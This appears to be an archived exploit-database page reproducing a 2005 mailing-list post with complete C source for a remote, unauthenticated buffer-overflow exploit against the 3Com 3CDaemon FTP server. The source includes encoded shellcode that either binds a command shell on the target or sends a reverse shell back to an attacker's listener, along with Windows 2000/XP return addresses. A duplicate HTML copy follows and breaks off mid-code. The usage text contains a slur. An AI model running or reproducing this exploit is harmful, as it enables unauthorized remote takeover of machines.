what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

3CDaemon.c

3CDaemon.c
Posted Feb 25, 2005
Authored by class101 | Site class101.org

3com 3CDaemon FTP unauthorized USER remote buffer overflow exploit that can bind a shell or reverse a shell back to a listener.

tags | exploit, remote, overflow, shell
SHA-256 | 58939b294c832619405a1eb0bebba42133ec3b0586bf8f742328b1ae9c4d4e5e

3CDaemon.c

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0156_01C515DB.5BC9CC60
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hat-Squad.com set a proper on that 5years old hole.
Clean code class101.org, class101.hat-squad.com
Here it is for a quick view on the list:

/*
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow

The particularity of this exploit is to exploits a FTP server
without the need of any authorization.

Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

Application Risk: Severely High
Internet Risk: Low

Hole History:

14-4-2002: BOF flaw found by skyrim
15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
17-2-2005: lame exploit released milw0rm.com/id.php?id=3D825
18-2-2005: proper exploit released hat-squad.com, class101.org, =
class101.hat-squad.com

Notes:

-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
-Nice call ebx offset found.
Stable accross Win2k Pro&Srv, SP4's serie, every OS languages.

Greet: =20
=20
Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com=20
class101.org=20
class101.hat-squad.com

*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif



char scode1[]=3D
file://XORed
"\xEB\x26\x90\x00\x00\x00\x00\x00\x00\x02\x06\x6C\x59\x6C\x59"
"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\x03\x58\x46\x57\x53\x32"
"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8\xF9\xFF\xFF\xFF"
"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C\x8B\x70"
"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x8B\x5B\x78"
"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x53\x51\x52"
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x34\x8B\x01"
"\xFE\xAC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x45\x09\x8D"
"\x44\x45\x08\x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x58\x5E\x56"
"\x50\x52\x2B\x4E\x10\x41\x0F\xB7\x0C\x4A\x8B\x04\x88\x01\xF8"
"\x0F\xB6\x4D\x09\x89\x44\x8D\xD8\xFE\x4D\x09\x75\xBE\xFE\x4D"
"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x1A\x53\xFF\xD0\x89\xC7\x6A"
"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\x82\x50\x8B\x45\x04"
"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02\x66\x35\x93"
"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x53\x53\x56"
"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x10\x55\x57"
"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\xFF\x55\xEC"
"\x8D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x5C\x63\x6D"
"\x64\x94\x31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x53\xFE\xCA"
"\x01\xF2\x52\x94\x8D\x45\x78\x50\x8D\x45\x88\x50\xB1\x08\x53"
"\x53\x6A\x10\xFE\xCE\x52\x53\x53\x53\x55\xFF\x55\xF0\x6A\xFF"
"\xFF\x55\xE4";

char scode2[]=3D
file://XORed
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x5E\x81\x73\x17\x0E\xB4"
"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\x5C\xC9\x23\x0E\xB4\xCC\x76\x58"
"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F\xCB\x26\x76\xB5\x75\xA8\x44"
"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x14\x17\x85\xB5\x71\x12\xF1"
"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x2E\x0F\x73\x74\xD1\x35"
"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\x85\xB8\xD4\xA8\x54"
"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE\xEB\xC1\x7E\x55"
"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\xB8\x14\x78\x12"
"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x62\x16\xE4\x8F"
"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\xB4\x9F\x23\x9E"
"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\xFD\x19\x6A\xAA"
"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x59\x63\x18\x59"
"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x63\x16\xFC\x87"
"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x4B\xCA\x27\x57"
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x84\xAE\xE3\x5E"
"\xE4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x85\x44\x70\x5D"
"\xDC\x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\xE1\xBB\x70\x59"
"\x4B\xCA\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\xF7\xD2\x67\x0E"
"\x3D\x7C\xA4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\xED\x6C\x88\x89"
"\x4E\x1C\xCF\x5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x90\xA3\x22\x0F"
"\x3D\xE3\x07\x46\x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x39\xDB\x07\x1E"
"\xE0\xCF\x72\x5F\xE5\xDE\x72\x47\xE5\xCE\x70\x5F\x4B\xEA\x23\x66"
"\xC6\x61\x90\x18\x4B\xCA\x27\xF1\x64\x16\xC5\xF1\xC1\x9F\x4B\xA3"
"\x6D\x9A\xED\xF1\xE1\x9B\xAA\xCD\xDE\x60\xDC\x38\x4B\x4C\xDC\x7B"
"\xB4\xF7\xD3\x84\xB0\xC0\xDC\x5B\xB0\xAE\xF8\x5D\x4B\x4F\x23";

char payload[1024];

char ebx[]=3D"\x08\xB0\x01\x78";
char ebx2[]=3D"\xB1\x2C\xC2\x77";
char pad[]=3D"\xEB\x0C\x90\x90";
char EOL[]=3D"\x0D\x0A";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if =
(argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return =
-1;}
if (argc=3D=3D5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc=3D=3D6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc=3D=3D6)
{
gip=3Dinet_addr(argv[4])^(long)0x93939393;
gport=3Dhtons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup =
error\n");return -1;}
if (argc=3D=3D6)
{
gip=3Dinet_addr(argv[4])^(ULONG)0x93939393;
gport=3Dhtons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=3Dhtonl(inet_addr(argv[2])), port;
if (argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else port=3D21;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=3Dsocket(AF_INET,SOCK_STREAM,0);
if (s=3D=3D-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) =3D=3D 1){target=3Debx;os=3D"Win2k SP4 Server =
English\n[+] Win2k SP4 Pro. English\n[+] Win2k =
SP4 Pro. Norsk\n[+] Win2k SP4 Server German\n[+] =
Win2k SP4 Pro. Dutch\n[+] Etc...";}
if (atoi(argv[1]) =3D=3D 2){target=3Debx2;os=3D"WinXP SP2 Pro. =
English\n[+] WinXP SP1a Pro. English\n[+] WinXP =
SP1 Pro. English";}
printf("[+] target(s): %s\n",os);
server.sin_family=3DAF_INET;
server.sin_addr.s_addr=3Dhtonl(ip);
server.sin_port=3Dhtons(port);
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3D3;timeout.tv_usec=3D0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,"USER ");
memset(payload+5,0x90,700);
memcpy(payload+5+229,&pad,4);
memcpy(payload+238,target,4);
if (argc=3D=3D6)
{
memcpy(&scode1[5], &gip, 4);
memcpy(&scode1[3], &gport, 2);
memcpy(payload+253,scode1,sizeof(scode1));
}
else memcpy(payload+253,scode2,sizeof(scode2));
strcat(payload,EOL);
if (send(s,payload,strlen(payload),0)=3D=3D-1) { printf("[+] sending =
error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif

printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}


void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_3com.exe Target VulnIP (bind mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT (bind =
mode)\n");
printf(" [+] . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT =
(reverse mode)\n");
printf("TARGET: \n");
printf(" [+] 1. Win2k SP4 Server English (*)\n");
printf(" [+] 1. Win2k SP4 Pro English (*)\n");
printf(" [+] 1. Win2k SP4 Server German (*)\n");
printf(" [+] 1. Win2k SP4 Pro China (*)\n");
printf(" [+] 1. Win2k SP4 Pro Dutch (*)\n");
printf(" [+] 1. Win2k SP4 Pro Norsk (*)\n");
printf(" [+] 2. WinXP SP2 Pro. English \n");
printf(" [+] 2. WinXP SP1a Pro. English (*)\n");
printf(" [+] 2. WinXP SP1 Pro. English \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or\n");
printf(" reverse a cmdshell on your listener.\n");
printf(" A wildcard (*) mean tested working, else, supposed =
working.\n");
printf(" Compilation msvc6, cygwin, Linux.\n");
return;
}
void ver()
{
printf(" =
\n");
printf(" =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D[0.1]=3D=3D=3D=3D=3D\n");
printf(" =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D3COM =
3CDaemon v2.0 Revision =
10=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DFTP Service, =
Remote Stack Overflow=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =3D=3D=3D=3D=3D=3Dcoded by =
class101=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[Hat-Squad.com =
2005]=3D=3D=3D=3D=3D\n");
printf(" =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D\n");
printf(" =
\n");
}


-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------

------=_NextPart_000_0156_01C515DB.5BC9CC60
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Hat-Squad.com set a proper on that =
5years old=20
hole.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Clean code class101.org,=20
class101.hat-squad.com</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Here it is for a quick view on the=20
list:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>/*<BR>3com 3CDaemon FTP Unauthorized =
"USER" Remote=20
BOverflow</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>The particularity of this exploit is to =
exploits a=20
FTP server<BR>without the need of any authorization.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Homepage: <A=20
href=3D"http://www.3com.com">www.3com.com</A><BR>version: 3CDaemon v2.0=20
rev10<BR>Link: <A=20
href=3D"ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip">ftp://ftp.3com=
.com/pub/utilbin/win32/3cdv2r10.zip</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Application Risk: Severely =
High<BR>Internet Risk:=20
Low</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Hole History:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;14-4-2002: BOF flaw found =
by=20
skyrim<BR>&nbsp;&nbsp;15-4-2002: crash exploit done.=20
securiteam.com/exploits/5NP050A75A.html<BR>&nbsp;&nbsp;04-1-2005: =
Updated=20
advisory by Sowhat =
securitytracker.com/id?1012768<BR>&nbsp;&nbsp;17-2-2005: lame=20
exploit released milw0rm.com/id.php?id=3D825<BR>&nbsp;&nbsp;18-2-2005: =
proper=20
exploit released hat-squad.com, class101.org,=20
class101.hat-squad.com</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Notes:</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>&nbsp;&nbsp;-4 bad bytes, 0x00, 0x25, =
0x0D, 0x0A,=20
badly interpreted by 3CDaemon<BR>&nbsp;&nbsp;-Nice call ebx offset=20
found.<BR>&nbsp;&nbsp;&nbsp;Stable accross Win2k Pro&Srv, SP4's =
serie, every=20
OS languages.</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Greet:&nbsp; =
<BR>&nbsp;&nbsp;<BR>&nbsp;&nbsp;Nima=20
Majidi<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Behrang=20
Fouladi<BR>&nbsp;&nbsp;Pejman<BR>&nbsp;&nbsp;Hat-Squad.com=20
<BR>&nbsp;&nbsp;class101.org =
<BR>&nbsp;&nbsp;class101.hat-squad.com</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>*/<BR>#include =
<stdio.h><BR>#include=20
<string.h><BR>#include <time.h><BR>#ifdef WIN32<BR>#include=20
"winsock2.h"<BR>#pragma comment(lib, "ws2_32")<BR>#else<BR>#include=20
<sys/socket.h><BR>#include <sys/types.h><BR>#include=20
<netinet/in.h><BR>#include <netinet/in_systm.h><BR>#include=20
<netinet/ip.h><BR>#include <netdb.h><BR>#include=20
<arpa/inet.h><BR>#include <unistd.h><BR>#include=20
<stdlib.h><BR>#include <fcntl.h><BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char scode1[]=3D<BR><A=20
href=3D"file://XORed">file://XORed</A><BR>"\xEB\x26\x90\x00\x00\x00\x00\x=
00\x00\x02\x06\x6C\x59\x6C\x59"<BR>"\xF8\x1D\x9C\xDE\x8C\xD1\x4C\x70\xD4\=
x03\x58\x46\x57\x53\x32"<BR>"\x5F\x33\x32\x2E\x44\x4C\x4C\x01\xEB\x05\xE8=
\xF9\xFF\xFF\xFF"<BR>"\x5D\x83\xED\x2C\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0=
C\x8B\x70"<BR>"\x1C\xAD\x8B\x78\x08\x8D\x5F\x3C\x8B\x1B\x01\xFB\x8B\x5B\x=
78"<BR>"\x01\xFB\x8B\x4B\x1C\x01\xF9\x8B\x53\x24\x01\xFA\x53\x51\x52"<BR>=
"\x8B\x5B\x20\x01\xFB\x31\xC9\x41\x31\xC0\x99\x8B\x34\x8B\x01"<BR>"\xFE\x=
AC\x31\xC2\xD1\xE2\x84\xC0\x75\xF7\x0F\xB6\x45\x09\x8D"<BR>"\x44\x45\x08\=
x66\x39\x10\x75\xE1\x66\x31\x10\x5A\x58\x5E\x56"<BR>"\x50\x52\x2B\x4E\x10=
\x41\x0F\xB7\x0C\x4A\x8B\x04\x88\x01\xF8"<BR>"\x0F\xB6\x4D\x09\x89\x44\x8=
D\xD8\xFE\x4D\x09\x75\xBE\xFE\x4D"<BR>"\x08\x74\x17\xFE\x4D\x24\x8D\x5D\x=
1A\x53\xFF\xD0\x89\xC7\x6A"<BR>"\x02\x58\x88\x45\x09\x80\x45\x79\x0C\xEB\=
x82\x50\x8B\x45\x04"<BR>"\x35\x93\x93\x93\x93\x89\x45\x04\x66\x8B\x45\x02=
\x66\x35\x93"<BR>"\x93\x66\x89\x45\x02\x58\x89\xCE\x31\xDB\x53\x53\x53\x5=
3\x56"<BR>"\x46\x56\xFF\xD0\x89\xC7\x55\x58\x66\x89\x30\x6A\x10\x55\x57"<=
BR>"\xFF\x55\xE0\x8D\x45\x88\x50\xFF\x55\xE8\x55\x55\xFF\x55\xEC"<BR>"\x8=
D\x44\x05\x0C\x94\x53\x68\x2E\x65\x78\x65\x68\x5C\x63\x6D"<BR>"\x64\x94\x=
31\xD2\x8D\x45\xCC\x94\x57\x57\x57\x53\x53\xFE\xCA"<BR>"\x01\xF2\x52\x94\=
x8D\x45\x78\x50\x8D\x45\x88\x50\xB1\x08\x53"<BR>"\x53\x6A\x10\xFE\xCE\x52=
\x53\x53\x53\x55\xFF\x55\xF0\x6A\xFF"<BR>"\xFF\x55\xE4";</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char scode2[]=3D<BR><A=20
href=3D"file://XORed">file://XORed</A><BR>"\xD9\xEE\xD9\x74\x24\xF4\x5B\x=
31\xC9\xB1\x5E\x81\x73\x17\x0E\xB4"<BR>"\x9F\x23\x83\xEB\xFC\xE2\xF4\xF2\=
x5C\xC9\x23\x0E\xB4\xCC\x76\x58"<BR>"\xE3\x14\x4F\x2A\xAC\x14\x66\x32\x3F=
\xCB\x26\x76\xB5\x75\xA8\x44"<BR>"\xAC\x14\x79\x2E\xB5\x74\xC0\x3C\xFD\x1=
4\x17\x85\xB5\x71\x12\xF1"<BR>"\x48\xAE\xE3\xA2\x8C\x7F\x57\x09\x75\x50\x=
2E\x0F\x73\x74\xD1\x35"<BR>"\xC8\xBB\x37\x7B\x55\x14\x79\x2A\xB5\x74\x45\=
x85\xB8\xD4\xA8\x54"<BR>"\xA8\x9E\xC8\x85\xB0\x14\x22\xE6\x5F\x9D\x12\xCE=
\xEB\xC1\x7E\x55"<BR>"\x76\x97\x23\x50\xDE\xAF\x7A\x6A\x3F\x86\xA8\x55\xB=
8\x14\x78\x12"<BR>"\x3F\x84\xA8\x55\xBC\xCC\x4B\x80\xFA\x91\xCF\xF1\x62\x=
16\xE4\x8F"<BR>"\x58\x9F\x22\x0E\xB4\xC8\x75\x5D\x3D\x7A\xCB\x29\xB4\x9F\=
x23\x9E"<BR>"\xB5\x9F\x23\xB8\xAD\x87\xC4\xAA\xAD\xEF\xCA\xEB\xFD\x19\x6A=
\xAA"<BR>"\xAE\xEF\xE4\xAA\x19\xB1\xCA\xD7\xBD\x6A\x8E\xC5\x59\x63\x18\x5=
9"<BR>"\xE7\xAD\x7C\x3D\x86\x9F\x78\x83\xFF\xBF\x72\xF1\x63\x16\xFC\x87"<=
BR>"\x77\x12\x56\x1A\xDE\x98\x7A\x5F\xE7\x60\x17\x81\x4B\xCA\x27\x57"<BR>=
"\x3D\x9B\xAD\xEC\x46\xB4\x04\x5A\x4B\xA8\xDC\x5B\x84\xAE\xE3\x5E"<BR>"\x=
E4\xCF\x73\x4E\xE4\xDF\x73\xF1\xE1\xB3\xAA\xC9\x85\x44\x70\x5D"<BR>"\xDC\=
x9D\x23\x0E\xD1\x16\xC3\x64\xA4\xCF\x74\xF1\xE1\xBB\x70\x59"<BR>"\x4B\xCA=
\x0B\x5D\xE0\xC8\xDC\x5B\x94\x16\xE4\x66\xF7\xD2\x67\x0E"<BR>"\x3D\x7C\xA=
4\xF4\x85\x5F\xAE\x72\x90\x33\x49\x1B\xED\x6C\x88\x89"<BR>"\x4E\x1C\xCF\x=
5A\x72\xDB\x07\x1E\xF0\xF9\xE4\x4A\x90\xA3\x22\x0F"<BR>"\x3D\xE3\x07\x46\=
x3D\xE3\x07\x42\x3D\xE3\x07\x5E\x39\xDB\x07\x1E"<BR>"\xE0\xCF\x72\x5F\xE5=
\xDE\x72\x47\xE5\xCE\x70\x5F\x4B\xEA\x23\x66"<BR>"\xC6\x61\x90\x18\x4B\xC=
A\x27\xF1\x64\x16\xC5\xF1\xC1\x9F\x4B\xA3"<BR>"\x6D\x9A\xED\xF1\xE1\x9B\x=
AA\xCD\xDE\x60\xDC\x38\x4B\x4C\xDC\x7B"<BR>"\xB4\xF7\xD3\x84\xB0\xC0\xDC\=
x5B\xB0\xAE\xF8\x5D\x4B\x4F\x23";</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char payload[1024];</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>char =
ebx[]=3D"\x08\xB0\x01\x78";<BR>char=20
ebx2[]=3D"\xB1\x2C\xC2\x77";<BR>char pad[]=3D"\xEB\x0C\x90\x90";<BR>char =

EOL[]=3D"\x0D\x0A";</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>#ifdef WIN32<BR>&nbsp;WSADATA=20
wsadata;<BR>#endif</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>void ver();<BR>void usage(char* =
us);</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>int main(int argc,char=20
*argv[])<BR>{<BR>&nbsp;ver();<BR>&nbsp;unsigned long =
gip;<BR>&nbsp;unsigned=20
short gport;<BR>&nbsp;char *target, *os;<BR>&nbsp;if=20
(argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv=
[0]);return=20
-1;}<BR>&nbsp;if (argc=3D=3D5){usage(argv[0]);return =
-1;}<BR>&nbsp;&nbsp;&nbsp; if=20
(strlen(argv[2])<7){usage(argv[0]);return -1;}<BR>&nbsp;&nbsp;&nbsp; =
if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
if=20
(strlen(argv[4])<7){usage(argv[0]);return -1;}<BR>&nbsp;}<BR>#ifndef=20
WIN32<BR>&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;&nbsp;gip=3Dinet_addr(argv[4])^(l=
ong)0x93939393;<BR>&nbsp;&nbsp;gport=3Dhtons(atoi(argv[5]))^(short)0x9393=
;<BR>&nbsp;}<BR>#define=20
Sleep&nbsp;&nbsp;sleep<BR>#define SOCKET&nbsp;&nbsp;int<BR>#define=20
closesocket(s) close(s)<BR>#else<BR>&nbsp;if=20
(WSAStartup(MAKEWORD(2,0),&wsadata)!=3D0){printf("[+] wsastartup=20
error\n");return -1;}<BR>&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;{<BR>&nbsp;&nbsp;gip=3Dinet_addr(argv[4])^(ULONG)0=
x93939393;<BR>&nbsp;&nbsp;gport=3Dhtons(atoi(argv[5]))^(USHORT)0x9393;<BR=
>&nbsp;}<BR>#endif<BR>&nbsp;int=20
ip=3Dhtonl(inet_addr(argv[2])), port;<BR>&nbsp;if=20
(argc=3D=3D4||argc=3D=3D6){port=3Datoi(argv[3]);} else =
port=3D21;<BR>&nbsp;SOCKET s;fd_set=20
mask;struct timeval timeout; struct sockaddr_in=20
server;<BR>&nbsp;s=3Dsocket(AF_INET,SOCK_STREAM,0);<BR>&nbsp;if=20
(s=3D=3D-1){printf("[+] socket() error\n");return -1;}<BR>&nbsp;if =
(atoi(argv[1]) =3D=3D=20
1){target=3Debx;os=3D"Win2k SP4 Server=20
English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;=20
Win2k SP4 Pro.&nbsp;&nbsp;=20
English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;=20
Win2k SP4 Pro.&nbsp;&nbsp;=20
Norsk\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;=20
Win2k SP4 Server=20
German\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;=20
Win2k SP4 Pro.&nbsp;&nbsp;=20
Dutch\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;=20
Etc...";}<BR>&nbsp;if (atoi(argv[1]) =3D=3D 2){target=3Debx2;os=3D"WinXP =
SP2&nbsp; Pro.=20
English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;=20
WinXP SP1a Pro.=20
English\n[+]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;=20
WinXP SP1&nbsp; Pro. English";}<BR>&nbsp;printf("[+] target(s):=20
%s\n",os);<BR>&nbsp;server.sin_family=3DAF_INET;<BR>&nbsp;server.sin_addr=
.s_addr=3Dhtonl(ip);<BR>&nbsp;server.sin_port=3Dhtons(port);<BR>&nbsp;con=
nect(s,(=20
struct sockaddr=20
*)&server,sizeof(server));<BR>&nbsp;timeout.tv_sec=3D3;timeout.tv_use=
c=3D0;FD_ZERO(&mask);FD_SET(s,&mask);<BR>&nbsp;switch(select(s+1,=
NULL,&mask,NULL,&timeout))<BR>&nbsp;{<BR>&nbsp;&nbsp;case=20
-1: {printf("[+] select() error\n");closesocket(s);return=20
-1;}<BR>&nbsp;&nbsp;case 0: {printf("[+] connect()=20
error\n");closesocket(s);return=20
-1;}<BR>&nbsp;&nbsp;default:<BR>&nbsp;&nbsp;if(FD_ISSET(s,&mask))<BR>=
&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;printf("[+]=20
connected, constructing the payload...\n");<BR>#ifdef=20
WIN32<BR>&nbsp;&nbsp;&nbsp;Sleep(1000);<BR>#else<BR>&nbsp;&nbsp;&nbsp;Sle=
ep(1);<BR>#endif<BR>&nbsp;&nbsp;&nbsp;strcpy(payload,"USER=20
");<BR>&nbsp;&nbsp;&nbsp;memset(payload+5,0x90,700);<BR>&nbsp;&nbsp;&nbsp=
;memcpy(payload+5+229,&pad,4);<BR>&nbsp;&nbsp;&nbsp;memcpy(payload+23=
8,target,4);<BR>&nbsp;&nbsp;&nbsp;if=20
(argc=3D=3D6)<BR>&nbsp;&nbsp;&nbsp;{<BR>&nbsp;&nbsp;&nbsp;&nbsp;memcpy(&a=
